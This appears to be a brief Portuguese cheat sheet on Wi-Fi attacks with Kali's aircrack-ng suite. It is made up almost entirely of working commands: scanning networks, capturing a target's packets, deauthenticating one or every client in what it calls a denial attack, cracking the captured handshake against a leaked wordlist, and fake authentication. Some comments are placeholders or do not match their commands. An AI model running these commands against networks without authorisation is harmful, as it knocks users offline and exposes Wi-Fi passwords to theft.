Kali: air
AiroDump
Sniffing
Vê os pacotes entre roteadores e devices
Inicialmente vemos as redes possíveis usando o AiroDump.
# Scan Networks
sudo airodump-ng -i wlan0mon
Escolhe uma rede para “snifar”.
# Captura Pacotes (Attack)
sudo airodump-ng --bssid {mac_address} --channel {channel number} --write {filename} wlan0mon
sudo airodump-ng --bssid 84:93:B2:E2:87:1B --channel 13 --write ~/Downloads/my_network wlan0mon
Utilizando o AirePlay, em um novo terminal, desautentica!
# Derruba apenas uma conexão (deautenticate 1)
sudo aireplay-ng --deauth 0 -a 84:93:B2:E2:87:1B -c 34:5D:9E:B2:A4:6D wlan0mon
# Irrestrito... derruba tudo, denial attack (deautenticate 0)
sudo aireplay-ng --deauth 0 -a 84:93:B2:E2:87:1B wlan0mon
Para mais informações
sudo aireplay-ng --help
Usando o AirCrack, confronta a captura com uma wordlist.
# ssss
aircrack-ng ~/Downloads/my_network-01.cap -w ~/Documents/Datasets/my_hat/rockyou2021.txt
Abre os pacotes no Wireshark.
# Deautenchicate
airmon-ng start wlan0mon 5 # Define o canal que vai operar!
# ssss
sudo aireplay-ng --fakeauth 30 -a {bssid} -h {macid} wlan0
sudo aireplay-ng --fakeauth 30 -a 98:DA:C4:DD:E4:6C -h 98:39:8E:6B:C1:9B wlan0mon
Deixe um comentário